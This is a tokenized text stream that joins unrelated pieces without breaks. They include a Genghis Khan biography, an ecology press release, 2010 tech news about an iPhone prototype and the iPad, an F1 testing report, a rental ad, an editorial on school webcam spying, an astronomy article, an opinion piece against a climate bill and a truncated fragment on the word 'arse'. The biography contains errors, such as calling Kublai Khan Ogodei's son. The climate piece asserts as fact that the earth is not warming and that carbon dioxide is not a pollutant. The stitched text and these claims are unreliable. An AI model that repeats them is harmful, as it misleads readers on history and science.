Genghis Khan ( c. 1162 –August 18 , 1227 ) was the legendary founder and leader of the Mongol Empire .
In a span of just 25 years , his horsemen conquered a larger area and greater population than the Romans did in four centuries .
To the millions of people conquered by his hordes , Genghis Khan was evil incarnate ; in Mongolia and Central Asia , however , he was widely revered .
Fast Facts : Genghis Khan Known For :
Khan was the founder and leader of the Mongol Empire .
: Khan was the founder and leader of the Mongol Empire .
Also Known As : Temujin
: Temujin Born : c. 1162 in Delun-Boldog , Mongolia
: c. 1162 in Delun-Boldog , Mongolia Died : August 18 , 1227 , in Yinchuan , Western Xia
: August 18 , 1227 , in Yinchuan , Western Xia Spouse(s ) : Borje , Khulan , Yesugen , Yesulun ( plus others )
: Borje , Khulan , Yesugen , Yesulun ( plus others ) Children : Jochi , Chagatai , Ogedei , Tolui ( plus others )
Early Life
Records of the Great Khan 's early life are sparse and contradictory .
He was likely born in 1162 , though some sources say 1155 or 1165 .
We know that the boy was given the name Temujin .
His father Yesukhei was the chief of the minor Borijin clan of nomadic Mongols , who lived by hunting rather than herding or farming .
Yesukhei had kidnapped Temujin 's young mother , Hoelun , as she and her first husband were riding home from their wedding .
She became Yesukhei 's second wife ; Temujin was his second son by just a few months .
Mongol legend claims that the baby was born with a blood clot in his fist , a sign that he would be a great warrior .
Hardship and Captivity
When Temujin was nine , his father took him to a neighboring tribe to work for several years and earn a bride .
His intended wife was a slightly older girl named Borje .
On the way home , Yesukhei was poisoned by rivals and died .
Temujin returned to his mother , but the clan expelled Yesukhei's two widows and seven children , leaving them to die .
The family survived by eating roots , rodents , and fish .
Young Temujin and his full brother Khasar grew to resent their eldest half - brother Begter .
They killed him and as punishment for the crime , Temujin was seized and enslaved .
His captivity may have lasted for more than five years .
Youth
Set free at age 16 , Temujin went to find Borje again .
She was still waiting for him and they soon married .
The couple used her dowry , a fine sable - fur coat , to make an alliance with Ong Khan of the powerful Kereyid clan .
Ong Khan accepted Temujin as a foster son .
This alliance proved key , as Hoelun 's Merkid clan decided to avenge her long - ago kidnapping by stealing Borje .
With the Kereyid army , Temujin raided the Merkids , looting their camp and reclaiming Borje .
Temujin also had help in the raid from his childhood blood - brother Jamuka , who would later become a rival .
Borje 's first son Jochi was born nine months later .
Consolidation of Power
After rescuing Borje , Temujin 's small band stayed with Jamuka 's group for several years .
Jamuka soon asserted his authority , rather than treating Temujin as a brother , which started a two - decade feud between the 19 - year - olds .
Temujin left the camp , along with many of Jamuka 's followers and livestock .
At the age of 27 , Temujin held a kurultai ( tribal council ) among the Mongols , who elected him khan .
The Mongols were only a Kereyid sub-clan , however , and Ong Khan played Jamuka and Temujin off one another .
As Khan , Temujin awarded high office not just to his relatives , but to those followers who were most loyal to him .
Unification of the Mongols
In 1190 , Jamuka raided Temujin 's camp , cruelly horse - dragging and even boiling alive his captives , which turned many of his followers against him .
The united Mongols soon defeated the neighboring Tatars and Jurchens , and Temujin Khan assimilated their people rather than follow the steppe custom of looting them and leaving .
Jamuka attacked Ong Khan and Temujin in 1201 .
Despite suffering an arrow shot to the neck , Temujin defeated and assimilated Jamuka 's remaining warriors .
Ong Khan then treacherously tried to ambush Temujin at a wedding ceremony for Ong 's daughter and Jochi , but the Mongols escaped and returned to conquer the Kereyids .
Early Conquests
The unification of Mongolia ended in 1204 when Temujin defeated the powerful Naiman clan .
Two years later , another kurultai confirmed him as Genghis Khan or universal leader of all Mongolia .
Within five years , the Mongols had annexed much of Siberia and what is today the modern Chinese Xinjiang province .
The Jurched Dynasty , ruling northern China from Zhongdu ( Beijing ) , noticed the upstart Mongol khan and demanded that he kowtow to its Golden Khan .
In reply , Genghis Khan spat on the ground .
He then defeated their tributaries , the Tangut , and in 1214 he conquered the Jurchens and their 50 million citizens .
The Mongol army numbered just 100,000 .
Conquests of Central Asia , the Middle East , and the Caucasus
Tribes as far away as Kazakhstan and Kyrgyzstan heard about the Great Khan and overthrew their Buddhist rulers in order to join his growing empire .
By 1219 , Genghis Khan ruled from northern China to the Afghan border and from Siberia to the border of Tibet .
He sought a trade alliance with the powerful Khwarizm Empire , which controlled Central Asia from Afghanistan to the Black Sea .
Sultan Muhammad II agreed , but then murdered the first Mongol trade convoy of 450 merchants , stealing their goods .
Before the end of that year , the wrathful Khan had captured every Khwarizm city , adding lands from Turkey to Russia to his realm .
Death
In 1222 , the 61 - year - old Khan called a family kurultai to discuss the matter of succession .
His four sons disagreed over which should become the Great Khan .
Jochi , the eldest , was born soon after Borje 's kidnapping and might not have been Genghis Khan 's son , so the second son Chagatai challenged his right to the title .
As a compromise , the third son Ogodei became the successor .
Jochi died in February 1227 , six months before his father , who passed away on August 18 , 1227 .
Ogodei took East Asia , which would become Yuan China .
Chagatai claimed Central Asia .
Tolui , the youngest , took Mongolia proper .
Jochi's sons controlled Russia and Eastern Europe .
Legacy
After Genghis Khan 's secret burial on the steppes of Mongolia , his sons and grandsons continued to expand the Mongol Empire .
Ogodei's son Kublai Khan defeated the Song rulers of China in 1279 and established the Mongol Yuan Dynasty .
The Yuan would rule all of China until 1368 .
Meanwhile , Chagatai pushed south from his Central Asian holdings , conquering Persia .
Within Mongolia , Genghis Khan revolutionized the social structure and reformed traditional law .
His was an egalitarian society , in which the humblest enslaved person could rise to be an army commander if he showed skill or bravery .
War booty was divided evenly among all warriors , regardless of social status .
Unlike most rulers of the time , Genghis Khan trusted loyal followers above his own family members — which contributed to the difficult succession as he aged .
The Great Khan forbade the kidnapping of women , probably due in part to his wife 's experience , but also because it led to warfare among different Mongol groups .
He outlawed livestock rustling for the same reason and established a winter - only hunting season to preserve game for the hardest of times .
Contrary to his ruthless and barbaric reputation in the west , Genghis Khan promulgated several enlightened policies that would not become common practice in Europe until centuries later .
He guaranteed freedom of religion , protecting the rights of Buddhists , Muslims , Christians , and Hindus alike .
Genghis Khan himself worshiped the sky , but he forbade the killing of priests , monks , nuns , mullahs , and other holy people .
A 2003 DNA study revealed that about 16 million men in the former Mongol Empire , about 8 % of the male population , carry a genetic marker that developed in one family in Mongolia about 1,000 years ago .
The most likely explanation is that they are descended from Genghis Khan or his brothers .
Sources
Lions , tigers and bears top the ecological pyramid -- the diagram of the food chain that every school child knows .
They eat smaller animals , feeding on energy that flows up from the base where plants convert sunlight into carbohydrates .
A new study examines complex interactions in the middle of the pyramid , where birds , bats and lizards consume insects .
These predators eat enough insects to indirectly benefit plants and increase their growth , Smithsonian scientists report .
" Our findings are relevant to natural communities like grasslands and forests , but also to human food production , as these insect - eating animals also reduce insect pests on crop plants , " said Sunshine Van Bael , scientist at the Smithsonian Tropical Research Institute .
Previous theory on food webs suggested that the effects of insect - eaters on plants would be weak , because animals like birds not only feed on herbivores -- which is good for the plants - but may also benefit them by feeding spiders and predatory insects .
If a bird eats a lot of spiders , for example , caterpillars could be " released " from spider predation and then consume more plant material .
The authors found that previous theory did not hold true ; in fact , the birds simply ate the spiders and the caterpillars .
The authors reviewed more than 100 studies of insect predation by birds , bats or lizards from four continents .
They found that the identity of the predator did n't make much of a difference .
Together , by eating herbivores and their insect predators , they reduced damage to plants by 40 percent , which resulted in a 14 percent increase in plant biomass .
" It 's no longer apt to say that one ' eats like a bird ' , " said Van Bael , " Our study shows that birds , bats and lizards act as one big vacuum cleaner up in the treetops .
Everything 's on the menu . "
Nevertheless , there is still a lack of experimental work on the overlap in diets of the insects that birds , lizards and bats are eating , and the insects that the predatory insects , themselves are eating .
" Our study shows that birds , bats and lizards protect plants , underscoring the importance of conservation of these species in the face of global change , " summed up lead author Kailen Mooney , professor of ecology and evolutionary biology at the University of California - Irvine .
Co-authors of this study , published online by the journal Proceedings of the National Academy of Sciences , also include researchers from the University of Maryland , the University of Missouri -- St. Louis , the University of Toledo , and the Smithsonian´s Migratory Bird Center at the National Zoological Park .
The Smithsonian Tropical Research Institute , headquartered in Panama City , Panama , is a unit of the Smithsonian Institution .
The institute furthers the understanding of tropical nature and its importance to human welfare , trains students to conduct research in the tropics and promotes conservation by increasing public awareness of beauty and importance of tropical ecosystems .
When word first broke that Gizmodo had a next - gen iPhone in their possession , a lot of people initially questioned the veracity of the story , or at least Gizmodo ’s explanation as to how they acquired the device .
After all , why would the notoriously secretive Apple entrust one of its most closely guarded prototypes to a 27 year old engineer ?
For many , the story just did n’t add up .
A few hours later , there would be no more doubt .
Gizmodo had , without question , scored one of the biggest scoops in tech history when they paid $ 5,000 for Apple ’s fourth generation iPhone , which has also been referred to as the iPhone HD .
And even now that we have proof , some are still scratching their heads , wondering why such a young engineer was allowed to leave Apple ’s campus with the device in the first place .
Well , you see , phones by their very nature require a lot more field testing under real world conditions than , say , a MacBook .
Signal strength , call quality , and bandwidth rates can vary wildly from area to area , and Apple really has no choice but to arm a lucky number of employees with next - gen iPhones and send them on their way .
Gray Powell was one of those individuals , and though his Linked In profile has since been removed , his job at Apple was to verify the iPhone ’s baseband software .
In a tweet from a few months ago , since set to private , Powell noted that he “ finds bugs ” and that ’s he ’s damn good at it .
Interestingly , a former Apple manager , speaking anonymously of course , told Bloomberg that Steve Jobs himself has to personally approve every person who carries a next - gen iPhone outside of Apple ’s secretive walls .
Apple Chief Executive Officer Steve Jobs personally monitors the so - called carry list of staff members allowed to take pre-release devices off the company ’s campus , according to the former employee .
Approved staff members must sign an additional confidentiality agreement , the person said .
While some have speculated that the recent iPhone faux pas will cause Apple to re-evaluate its testing methods , and that perhaps only high level executives will get access to pre-release devices , the reality is that Apple ca n’t afford that luxury .
This incident is just something Apple will have to swallow , accept , and move on from .
Remember that in the months preceding the original iPhone launch in 2007 , nearly 200 field technicians from AT&T were given iPhones for testing purposes .
Over the course of a few weeks , they logged over 10,000 hours of phone usage , including 5,000 hours of voice calls alone and approximately 5 GB of data usage .
Would Jobs prefer that pre-release iPhones never leave 1 Infinite Loop ?
Sure , but he would much rather prefer a robust product that , you know , actually works .
As much as Microsoft has revealed about Windows Phone 7 thus far in the past two months , one critical , differentiating element that it 's going to be able to lord over its competitors -- true Office support -- has been a bit of a black box .
We 're starting to see a little bit more about the Office team 's next - gen mobile product now , though , thanks to a pair of new videos that have been published this week .
The first focuses on the email and calendar experience , but we do see one pretty awesome trick when the demo opens a PowerPoint file inline from the email client , edits it , and sends it back to the original sender .
The second video dives deeper on the actual Office hub , where we get a quick look at the Word editor -- and as you might expect , it 's squeaky - clean and nearly UI - free , just like pretty much everything else in the platform .
Peep the videos after the break .
[ Thanks , skipper ]
There is a point when playing rhythm games such as Rock Band or Guitar Hero where you hit a kind of wall ; there is only so much to learn hitting buttons as notes flow down the screen .
Power Gig : Rise of the Six String — in addition to having a terrible title — wants to break that wall by teaching you actual guitar skills if you choose to move past what the tradition rhythm game has offered .
The guitar peripheral is an actual six - string electric guitar , although we 're promised that the full band bundle of guitar , drums , and microphone will be priced competitively with other rhythm bundles on the market .
We had a chance to see the game being played in front of us , although hands - on testing was forbidden .
The notes came down the screen , connected by a pulsing ribbon , showing the player what button to hit on the guitar 's neck .
Any number of strings hit will register as a correct hit .
In this mode , you will be able to use your existing rhythm game guitars .
The real meat of the game happens when you move to the higher difficulty levels , where the dots are replaced by numbers , showing you what strings to play .
A green two means you 'll be pressing down on the second string down from the top of the neck , in the green section .
Tutorials will show you how to hold your hands and fingers to create power chords .
" We wo n't be marketing this as a learn - to - play guitar product , " I 'm told .
The idea is more that players will seamlessly move from the more video game sections of the title into modes that teach real guitar skills .
A dampener is in place on the strings to keep them from vibrating and making noise while playing , but it can also be lowered to allow the strings to ring out fully ; the guitar can then be plugged into an amplifier and played .
It was stressed over and over that it 's a real guitar .
It will be cooler to hold a real guitar , and after mastering some of the game modes you 'll know the basics to actually play many of the songs .
745 Studios was born out of First Act , a company that specialized in mass retail musical instruments ; they know how to make a musical instrument on a budget .
" On the hardware side of things , we 're uniquely qualified to bring this sort of product to market , " a company representative tells me .
745 Studios also claims its guitar is the most complex peripheral ever made .
It can sense which strings are being hit , which ones are being strummed ... the gameplay elements we 're seeing today are merely scratching the surface of what 's available .
We were told that downloadable lessons may be available when the game is released on the Xbox 360 and PlayStation 3 .
The company hinted at big partnerships with musicians , although specifics will have to wait until closer to E3 .
" We 're talking to artists who have shied away from these games in the past , due to the fact that you 're pressing buttons . "
With a real guitar being used as a gaming instrument , that barrier has been removed , and it seems that some bands and artists are intrigued by the idea .
" It 's no secret that the music genre has taken a hit , but there are two brands that became billion dollar brands overnight .
Although it's on the decline , there is still a significant installed base and audience , " the company said .
Real instruments , with more complex gameplay at the higher levels , mixed with the ability to pick up an actual working guitar without the intimidation factor are the main selling points of this game .
We 're also promised drum controls that are " just as revolutionary , " but again , we 're going to have to wait until E3 .
What 's our take on this ?
The game looked like a Guitar Hero or Rock Band clone , but watching the difficulty move into actual power chords that sound like the real songs when played — and the company promises only real songs , with master recordings — was compelling .
I was handed the guitar to play with , and the 2/3 scale was tricky to get used to , but we were shown a full - scale guitar peripheral that will be sold as a premium SKU .
The guitar looks and feels like a beginner instrument , but that 's the point : to take rhythm gamers and turn them into a market that is now interested in buying and playing real guitars .
There are worse goals , and this group has already succeeded in putting low - cost guitars in the mass market .
We 'll see what Harmonix has up its sleeve for Rock Band 3 , but new ideas in rhythm games are always very welcome .
Our high - quality accommodations are perfect for Costa Rica vacations .
In fact , we are the official company and we have the largest and most exclusive rental portfolio in the world - class Los Sueños Resort & Marina .
We combine the luxury and space of a magnificent private residence with the services of a hotel .
Why choose a hotel room when you can have so much more ?
Whether it ’s a Costa Rica suite or Costa Rica villa , we offer you the stay of a lifetime .
Choose from spacious 1 to 3 bedroom condominiums to 3 to 8 bedroom private homes built to the highest international standards .
Share this article on LinkedIn Email
Felipe Massa marked his official return to contemporary Formula 1 machinery with the fastest time on the first morning of pre-season testing at Valencia in Spain on Monday .
Having seen early shakedown plans for his new Ferrari F10 abandoned because of bad weather in Italy over the weekend , Massa gave an early indication about the promise of his team 's 2010 challenger with a strong run early on .
Although testing times are not necessarily truly representative of form , Ferrari will at least be encouraged by the fact that the car has appeared to hit the ground running on the opening day of this three - day test .
Less than two - tenths behind Massa 's best lap of 1m13.088s was Pedro de la Rosa in the BMW Sauber C29 , showing that his team 's lack of sponsors and BMW works involvement have not been a hindrance to the efforts made over the winter to produce the new car .
Third fastest Nico Rosberg spent the early hours of the test watching from the garage , as his Mercedes GP team checked out the new W01 following its first installation lap , but he slowly improved his times over the morning before handing the car over to team - mate Michael Schumacher .
McLaren had test driver Gary Paffett on hand for the first day of running for the new MP4 - 25 , which had been launched last week .
He was fourth fastest , ahead of Rubens Barrichello in the Williams and Robert Kubica in the Renault .
Sebastien Buemi only managed to complete 10 laps in the first hours of running , as his Scuderia Toro Rosso outfit work on ironing out the normal new car niggles .
Morning times : Pos Driver Team Time Laps 1 . Felipe Massa Ferrari 1m13.088s 32 2 . Pedro de la Rosa BMW Sauber 1m13.247s 27 3 . Nico Rosberg Mercedes 1m13.543s 39 4 . Gary Paffett McLaren 1m14.018s 34 5 . Rubens Barrichello Williams 1m14.449s 42 6 . Robert Kubica Renault 1m15.298s 37 7 . Sebatien Buemi Toro Rosso 1m19.279s 10
Text Entry and Editing :
While most modern smartphones are designed with mobile email in mind , I find that they 're best used for email triage -- they 're great to quickly check what 's important , what requires an urgent response , and what to delete .
Emails that require long responses , however , do n't work well for me on phones .
Likewise , while I 've written in the past on small screens , editing and creating long documents on a phone is a challenge .
For my tests , I used the iPad 's email client along with iWork for creating as well as editing text .
The large 1024 x 768 display made a huge difference in the way I was able to work .
I was pleasantly surprised by the enhanced email views which made it easier to mange and mail and how the large screen facilitated writing long email responses .
The larger screen made seeing and editing documents much more pleasant .
I found the onscreen keyboard acceptable for both editing and moderate text entry , but when it came to writing long documents , I found it much easier and more productive to use the iPad with either the keyboard dock or a Bluetooth keyboard .
( I had no issues with using both Apple 's Bluetooth and keyboard and old Stowaway foldable keyboard . )
Verdict ?
The iPad can be used for long document creation and editing with the onscreen keyboard -- but if I 'm doing it on a regular basis , I 'd want an external keyboard with me .
Working With Numbers :
One task for which phones have failed me time and again was attempting to read fairly large spreadsheets -- I do n't even bother trying to create them .
This is where the iPad 's screen came to the rescue once again .
The crisp display made all the difference .
I had no issues importing Excel files into iWork and seeing the data I needed at a glance .
Creating the framework of a consumer survey was a breeze and I did n't even need to resort to an external keyboard .
However , Numbers does n't export natively to Excel , making a connection to iWork on the desktop necessary to share with Microsoft Office users .
Verdict ?
I would n't want to build a monster five year revenue projection on it , but I 'd have no problem viewing or editing such a document .
Numbers and the iPad mesh well , although I 'm looking forward to seeing how other third party Office apps fare with Excel compatibility .
While the iPad may look like a large iPod touch , in terms of computing , it 's much closer in functionality to a PC than a phone .
This is another difficult -- or impossible , depending on the device -- task to perform with a phone .
Thanks to the iPad 's support for VGA - out via an added dongle that costs extra , presenting should be a non-issue , but was n't something I could try .
Apple 's dongle was n't available for me to test , so this is something I 'll need to revisit in practice .
One issue I did find is that while Keynote works well importing many PowerPoint presentations , it 's much like its big brother on the desktop , socomplex presentations will need tweaking – in some cases quite a bit – in order to be usable .
Like Numbers , there 's also no PowerPoint export .
While not an activity per se , one of the challenges of replacing your laptop with a phone is battery life .
No phone I 've tried could handle the extra workload I put on it with extended email and productivity use .
The iPad 's battery life is excellent .
I have n't been able to test Apple 's ten hour battery life claim directly , but I had no problem getting through full days of testing and use without a need to recharge .
Given my usage , I could easily see getting through a couple of days of moderate use and at least a full day of heavy use on a single charge .
Bottom line ?
My first impressions of the iPad as a productivity tool are pretty good .
The XGA display renders it much more usable than many netbooks and its performance proves quite capable of handling complex tasks .
In addition to Office tasks I also used SketchBook Pro and PhotoGene to both create and edit graphics and photos .
Both allowed a degree of sophistication not found in their iPhone counterparts .
So what 's missing ?
The required accessories .
In order to make the iPad a real productivity tool capable of replacing your laptop , you 're going to want a Bluetooth keyboard , the VGA adapter for presenting , and a copy of iWork ( or another compatible office suite ) .
Even then , you 're still going to be missing some of the functionality that you 're only going to get on a full computer .
As for me ?
Given the iPad 's relatively light weight , I can envision traveling with the iPad in addition to a laptop on long trips , leaving my laptop in the hotel room and using the iPad throughout the day and taking just a smartphone for evening use .
For shorter trips of less than a week , my laptop 's going to stay home and the iPad will be my new travel buddy .
As everyone 's case is a little different , I welcome thoughts from others as they receive their devices to let me know their use cases and productivity scenarios .
While the iPad may look like a large iPod touch , in terms of computing , it 's much closer in functionality to a PC than a phone .
The net result is a framework for computing for the next generation of devices .
In the long run , that might be what 's most important .
Michael Gartenberg is a partner at Altimeter Group .
His weblog can be found at gartenblog.
net .
Contact him at gartenberg AT gmail DOT com .
Views expressed here are his own .
A Pennsylvania town has been roiled by a local high school using cameras in school - issued laptops to spy on students .
Almost as shocking is the fact that the federal wiretap law that should prohibit this kind of surveillance does not cover spying done through photography and video in private settings .
Senator Arlen Specter , a Democrat of Pennsylvania , is proposing to amend the federal wiretap statute to prohibit visual spying that is not approved by a court in advance .
Congress should move quickly to make this change .
Lower Merion , outside of Philadelphia , gave students at Harriton High School laptops that they could take home to use to do their work .
It did not tell the students , however , that the laptops were equipped with special software that allowed them to observe the students through the computers ’ built - in cameras .
The purpose , the school district later explained , was to protect the laptops from theft or damage .
Using this surveillance capability , school officials found images that led them to believe that Blake Robbins , a 15 - year - old student , was using illegal drugs .
Mr. Robbins said the “ pills ” he was seen consuming were Mike and Ike candies .
His parents filed a lawsuit against the school district , charging that it had illegally spied on their son .
An optical image of Arp 220 , a nearby example of a merged starburst galaxy .
CfA astronomers have used the SMA to study what seems to be an analogous galaxy from a much earlier epoch , about ten billion years ago .
They conclude that although the processes at work in the distant galaxy produce extreme luminosities , they closely resemble similar activity in local galaxies .
Credit : NASA , ESA , the Hubble Heritage - ESA / Hubble Collaboration , and A. Evans ( UVa / NRAO / Stony Brook )
( PhysOrg.com ) --
Distant galaxies are not only far away in space .
Because it takes time for their light to reach us , they are also very far away in time -- snapshots from the distant past .
The most distant galaxies known are seen as they were when the universe was less than a billion years old , and their light has been traveling towards us for over twelve billion years .
Astronomers are able to study these remote , ancient galaxies because they are fantastically bright , some of them hundreds of times more luminous than our Milky Way .
Astronomers want to understand them because somehow these primeval galaxies develop into modern galaxies , like our own or others in our cosmic neighborhood .
One outstanding question exists : what makes these galaxies so bright ?
CfA astronomers Steve Longmore , Ray Blundell , Mark Gurwell , and Dave Wilner , together with eighteen of their colleagues , used the Submillimeter Array ( SMA ) and several other telescopes to study a luminous galaxy whose light has been traveling towards us for ten billion years .
Unlike most other known , bright , but remote galaxies , this one is fortuitously situated directly behind ( as seen from earth ) a much closer cluster of galaxies whose gravity acts like a lens to re-image the light .
That coincidence , combined with the SMA 's unique ability to see very fine spatial details at submillimeter wavelengths , allowed the scientists to measure individual clouds of gas and dust in the far - away galaxy .
Writing in the latest issue of the journal Nature , the team reports that these clumps are similar to star - forming regions in the Milky Way , except larger and much more luminous .
From these and other characteristics of the clumps , the scientists conclude that vigorous star - formation is underway in this galaxy with underlying physical processes that are similar to those in normal galaxies , just much more intense .
The possible reasons for such extreme activity are less clear , but the authors suggest that a galaxy collision , such as is commonly seen in the local universe , can stimulate the production of these large clumps .
The new paper is significant both because it clearly determines the nature of the huge luminosities in this far - away galaxy , and because it implies that current recipes for modeling star formation can be applied to these extreme cases .
Explore further Nearby Extreme Galaxies Have Link to Humble Roots
“ Remembering Playland At The Beach ” , a documentary by Tom Wyrsch about San Francisco ’s legendary Playland at the Beach amusement park , premiers on March 16th at The Balboa Theater in San Francisco .
A full length documentary about San Francisco ’s famous 10 - acre seaside amusement park , Playland at the Beach .
Located next to Ocean Beach , it was torn down in 1972 to make way for a condominium development .
Gone now for more than 3 decades , it remains one of the city ’s lost treasures .
Go back in time to see Laffing Sal , the Fun House , the Carousel , the Big Dipper , the Diving Bell , Dark Mystery , Limbo , Fun-tier Town , and much , much more , all through the eyes of the people who were there .
The first and only documentary ever made about Playland .
Lucy Cooke is a self - described “ frog - loving filmmaker , ” who picked up from a soul - draining job in London and went to South America , where she ’s been investigating the amphibian extinction crisis .
As the Amphibian Avenger ( the title of her blog ) , Cooke has also had time to pop up to visit the Aviarios Sloth Sanctuary in Costa Rica — the only program of its kind in the world ) and has shot awesome footage .
So , you know , if frogs are n’t your thing , it ’s like they say : Come for the marsupials ; stay for the amphibians .
- Advertisement -
Source : Amphibian Avenger
On Wednesday , Senators John Kerry ( D - MA ) and Joe Lieberman ( I - CT ) plan to introduce legislation designed to inflate the cost of energy , strain family budgets , and decimate America 's manufacturing sector -- all in the name of supposedly saving the climate .
Kerry and Lieberman have been revamping legislation that narrowly passed the House of Representatives last year .
The House bill imposes oppressive limits on carbon dioxide ( CO 2 ) emissions and establishes a complex cap - and - trade scheme in which the federal government determines how much CO 2 a business may emit .
If a business exceeds its allowance , it may purchase additional " carbon credits " from an exchange , where the credits will be traded like a commodity .
Rules for the exchange of carbon credits , including the trading of carbon derivatives , are addressed in the House bill , and my sources tell me that the Senate version will include these same stratagems .
In an e-mail sent to the media last week regarding their plans , Kerry and Lieberman said , " We can no longer wait to solve this problem which threatens our economy , our security and our environment . "
My insiders also say the new Kerry - Lieberman proposal will keep the House bill 's goal of attaining a 17 - percent reduction of greenhouse gases ( below their 2005 level ) by 2020 .
Apparently the Senate bill will allow cap - and - trade to hit power companies first , and then within six years include the manufacturing sector .
The new bill apparently calls for more loan guarantees to build nuclear plants and grants U.S. coastal states a share of the revenue produced by any expansion of offshore oil and natural - gas drilling .
This is a bill that will cause all of us to suffer great loss .
Presently , 40 percent of CO 2 emissions in the United States are derived from electricity generation , 35 percent from transportation , and 25 percent from business , industry , and natural gas to heat homes .
So where will the 17 % cut come from , especially given that ( according to U.S. census projections ) there will be an additional 30 million people in the United States by 2020 ?
If the cuts are distributed proportionately , the biggest blow will be to electricity production .
Since 50 percent of our nation 's electricity is derived from coal , that industry and its customers will be hit hardest .
Coal plants are going to have to be shuttered .
And what will replace that energy resource ?
Nothing .
Some might counter that the House bill touts complex tax credits for wind and solar development .
However , when the wind is n't blowing and the sun is n't shining , those two alternatives do n't provide a watt of energy -- they 're simply enhancements , not baseload providers .
Additionally , the Kerry - Lieberman loan giveaway for the construction of nuclear plants -- which do not generate carbon emissions -- is simply a lure to entice gullible Republicans to bite , because the White House is not a fan of nuclear power .
Recall that during his January State of the Union address , Mr. Obama said that America needs to be " building a new generation of safe , clean nuclear power plants in this country . "
In an apparent move to make good on his promise , two days after the speech , Bloomberg reported : " President Barack Obama , acting on a pledge to support nuclear power , will propose tripling guarantees for new reactors to more than $ 45 billion [ . ] "
However , the proposal was a ruse .
Many forget that shortly after taking office Obama 's first budget planned to cut off money for the Nevada nuclear waste repository at Yucca Mountain -- meaning that the $ 10 billion in taxpayer dollars spent since 1983 to ready Yucca for storing nuclear waste was a total loss .
Yucca Mountain will officially be zeroed out in fiscal year 2011 .
Meantime , Energy Secretary Steven Chu has announced the creation of a special panel to find a solution for storing nuclear waste .
Problem is , we already had a solution -- Yucca Mountain .
America has no nuclear option .
And , as I have written here at American Thinker , the probability of additional drilling for domestic fossil fuels is low as well .
So where will the carbon cuts come from ?
They 'll come from the American people , who will be forced to use less energy because of the higher costs imposed by cap - and - trade and a variety of new energy taxes .
Proving my point , last week members of Congress , including Speaker Nancy Pelosi , took part in the Good Jobs , Green Jobs National Conference .
One of the better - attended seminars was entitled " Efficiency and Renewables . "
Presenters included Nancy Sutley , White House Council on Environmental Quality .
According to the brochure promoting this session , " The cheapest , cleanest , and fastest emission reductions will come from the energy we never have to use at all .
Cutting energy use also saves money on homeowners ' electricity bills and reduces costs for business . "
Translation : America does not need a plan for additional power plants to serve a growing population ; instead , the people must use less power .
Coercion through increased pricing will be a key prod in producing the societal behavior modification necessary to accomplish this goal .
By the way , Nancy Sutley is also the woman who announced the hiring of the radical Van Jones in March 2009 , declaring : " Van Jones has been a strong voice for green jobs , and we look forward to having him work with departments and agencies to advance the President 's agenda of creating 21st - century jobs that improve energy efficiency and utilize renewable resources .
Jones will also help to shape and advance the administration 's energy and climate initiatives with a specific interest in improvements and opportunities for vulnerable communities . "
Further straining the family budget , a new set of fees and taxes will be imposed on all sectors of the economy that produce greenhouse gases .
This will include transportation , farming , livestock production -- even restaurants that cook barbecued chicken and ribs over an open flame and bottling companies that sell fizzy drinks .
To absorb the increased cost of doing business , companies large and small will be forced to raise their prices .
Already pinched personal bank accounts will be further hammered , as virtually everything is going to cost more .
The Kerry - Lieberman bill is also a job - killer .
To meet the demands of the new emissions limits , the few manufacturing businesses that remain in the United States will be further shipped overseas .
This is a part of an elitist plan to redistribute America 's wealth abroad .
In other words , this legislation will purposefully execute the loss of well - paying domestic jobs , so that those in third world and underdeveloped nations have a chance to improve their standard of living -- at our expense .
Proving my point is the House version of this bill .
If your manufacturing job is shipped overseas , you are eligible for three years of unemployment compensation at 70 % of your pay , plus retraining and relocation expenses .
The intent is to pacify your anger with a three - year paid vacation .
And another dirty little secret about the Democrats ' need to pass cap - and - trade :
It 's a revenue - builder .
According the Wall Street Journal , the cap - and - trade system could actually generate between roughly $ 1.3 trillion and $ 1.9 trillion between fiscal years 2012 and 2019 .
This so - called energy bill is a punch to the gut that American does not need .
And keep in mind , as I have conclusively proven through past missives at American Thinker , as well as in my book Climategate , that the temperature of the earth is not warming , carbon dioxide is not a pollutant , and without the greenhouse effect , planet Earth would be a big ball of ice .
To pass , cap - and - trade will need bipartisan support .
Thus far only Senators Lindsey Graham ( R - SC ) and Susan Collins ( R - ME ) have spoken out in favor of supporting a mandatory cap on greenhouse gases .
However , other Senate Republicans who could cross over and support this bill are Olympia Snowe of Maine , Scott Brown of Massachusetts , George LeMieux of Florida , Judd Gregg of New Hampshire , and the retiring George Voinovich of Ohio .
Video : Perching Drones Learn How to Land Vertically on Walls
Moth - like drones could quietly conduct surveillance or creep closer to targets , while recharging or ducking inclement weather
You may have heard that Allison Fine and Beth Kanter have co-authored a book called The Networked Nonprofit .
At the Nonprofit Technology Conference , they signed printed copies of the first chapter , “ Introducing Networked Nonprofits . ”
In short , networked nonprofits are defined not by websites and software but by the networked culture that they fully embrace .
The first chapter of the book underscores several qualities that Networked Nonprofits share :
Transparent – During a presentation in Atlanta , Beth and Allison used a sponge ( the fry - cook ocean kind , not the kitchen ) to illustrate transparency : A sponge clings to rock no matter how many times it ’s battered by waves .
Your organization is firmly grounded in its cultural identity , organizational goals and mission .
A sponges filter out nutrients as waves pass through it .
Your organization grows by making it easy for “ outsiders to get in and insiders to get out . ”
Value Networks –
You value the connections your nonprofit has online and offline .
And you nurture key relationships that spread the “ good word ” through the network .
Comfort With Tools –
Your nonprofit is comfortable using blogs , Twitter , Facebook and other tools that facilitate two - way conversation .
Networked Ecosystem – You ’re not trying to do it all .
Your nonprofit knows that it ’s “ part of a much larger ecosystem or organizations and individuals that are all incredible resources for their efforts . ”
Courageous –
You ’re not afraid to lose control of your message , your logo , or your message .
You know that the wisdom and passion of your supporters can have an infinitely greater impact than you and your staff .
Trusting –
You trust your supporters to make good decisions on behalf of your organization .
Your organization focuses on giving them the tools they need instead of enforcing copyright laws .
Athletic – Social media is not a set of tools to be used only by your IT or marketing folks .
Your organization understands the power that Facebook and Twitter have in the lives of your supporters because you use the tools yourself .
It ’s a contact sport .
Note : Beth Kanter is a partner in Socialbrite .
You can pre-order The Networked Nonprofit on Amazon .
How networked is your organization ?
Share your thoughts in the comments .
Cross-posted from JohnHaydon.com .
John Haydon delivers social web strategy solutions for “ the quick , the smart , and the slightly manic . ”
Curious ?
Then visit the John Haydon blog , follow him on Twitter or leave a comment .
Piers Kelly writes : ... let me explain why I like ‘ arse ’ .
For me it ’s all about the ‘ r ’ .
It leaps off the page with a meaty trill , evoking at once the hairy bum of a commando - kilted highlander and the war cry of a Cornish pirate .
Piers Kelly writes :
